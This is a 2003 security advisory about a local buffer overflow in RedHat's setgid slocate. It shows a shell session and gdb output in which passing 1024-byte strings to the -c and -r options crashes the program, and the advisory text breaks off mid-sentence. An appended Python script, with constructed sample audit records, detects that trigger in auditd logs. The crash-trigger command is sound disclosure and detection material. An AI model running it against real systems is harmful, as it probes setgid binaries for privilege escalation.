slocate buffer overflow
25th Jan 2003 [SBWID-5952]

	inkubus, with credits to Knight420, Team TESO,
	Michal Zalewski, Aleph1, dvdman, says in a USG Security Advisory:

	According to research done by USG team members and Knight420, who
	informed us about this vulnerability a week earlier, there is a local
	buffer overflow in the slocate package shipped with most newer
	RedHat distributions. We have tested the vulnerability only in RedHat
	Linux 7.2 and 7.3, but we think that other Linux/*nix systems that
	provide the slocate package may be vulnerable too. The overflow appears
	when slocate is run with two parameters, -c and -r, using as
	arguments a 1024 (or 10240, as Knight420 has informed us earlier) bytes

	[inkubus@USG audit]$ rpm -qf /usr/bin/slocate && ls -al /usr/bin/slocate
	-rwxr-sr-x    1 root     slocate     25020 Jun 25  2001 /usr/bin/slocate
	[inkubus@USG audit]$ /usr/bin/slocate -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"`
	Segmentation fault
	[inkubus@USG audit]$ gdb /usr/bin/slocate
	GNU gdb Red Hat Linux (5.1.90CVS-5)
	Copyright 2002 Free Software Foundation, Inc.
	GDB is free software, covered by the GNU General Public License, and you are
	welcome to change it and/or distribute copies of it under certain conditions.
	Type "show copying" to see the conditions.
	There is absolutely no warranty for GDB.  Type "show warranty" for details.
	This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
	(gdb) r -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"`
	Starting program: /usr/bin/slocate -c `perl -e "print 'A' x 1024"` -r `perl -e "print 'A' x 1024"`
	warning: slocate: could not open database: /var/lib/slocate/slocate.db: Permission denied
	warning: You need to run the 'updatedb' command (as root) to create the database.
	warning: slocate: decode_db(): BBBBBBBBBBBB: No such file or directory
	warning: You need to run the 'updatedb' command (as root) to create the database.
	(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
	Program received signal SIGSEGV, Segmentation fault.
	0x42080b1b in strlen () from /lib/i686/


	New release available
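
Added example, not part of the advisory or of slocate: a log check for the trigger the advisory describes, slocate run with a -c or -r value of 1024 bytes or more. It assumes auditd-style EXECVE records in which each argument fits in a single a<N>= field; the sample records are constructed.

```python
import re

THRESHOLD = 1024            # smallest argument size the advisory reports as crashing
WATCHED = {"-c", "-r"}      # the two options named in the advisory
ARG_RE = re.compile(r'\ba(\d+)=("[^"]*"|[0-9A-Fa-f]+)')

def decode_arg(raw):
    # auditd quotes plain arguments and hex-encodes the others
    return raw[1:-1] if raw.startswith('"') else bytes.fromhex(raw).decode("latin-1")

def parse_execve(line):
    """Return argv from one EXECVE record, or None for other record types."""
    if "type=EXECVE" not in line:
        return None
    pairs = sorted((int(i), decode_arg(v)) for i, v in ARG_RE.findall(line))
    return [v for _, v in pairs]

def flag_slocate(argv, threshold=THRESHOLD):
    """List (option, value_length) for -c/-r values of at least `threshold` bytes."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "slocate":
        return []
    return [(opt, len(val)) for opt, val in zip(argv[1:], argv[2:])
            if opt in WATCHED and len(val) >= threshold]

def scan(lines):
    """Return [(line_number, hits)] for every record that trips the check."""
    found = []
    for n, line in enumerate(lines, 1):
        hits = flag_slocate(parse_execve(line))
        if hits:
            found.append((n, hits))
    return found

# Constructed sample records (not taken from a real system)
SAMPLE = [
    'type=EXECVE msg=audit(1043452800.101:11): argc=3 a0="slocate" a1="-r" a2="passwd"',
    'type=EXECVE msg=audit(1043452860.202:12): argc=5 a0="/usr/bin/slocate" '
    'a1="-c" a2="%s" a3="-r" a4="%s"' % ("A" * 1024, "A" * 1024),
    'type=EXECVE msg=audit(1043452920.303:13): argc=3 a0="/usr/bin/slocate" '
    'a1="-c" a2=' + "41" * 1023 + "20",   # hex-encoded: 1023 x "A" plus a space
    'type=SYSCALL msg=audit(1043452920.303:13): arch=40000003 syscall=11 success=yes',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE):
        print("record %d: oversized slocate argument(s) %s" % (n, hits))
```

Arguments long enough for auditd to split them into a<N>[0]=, a<N>[1]= pieces are not reassembled here, so the 10240-byte variant would need that handling added.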
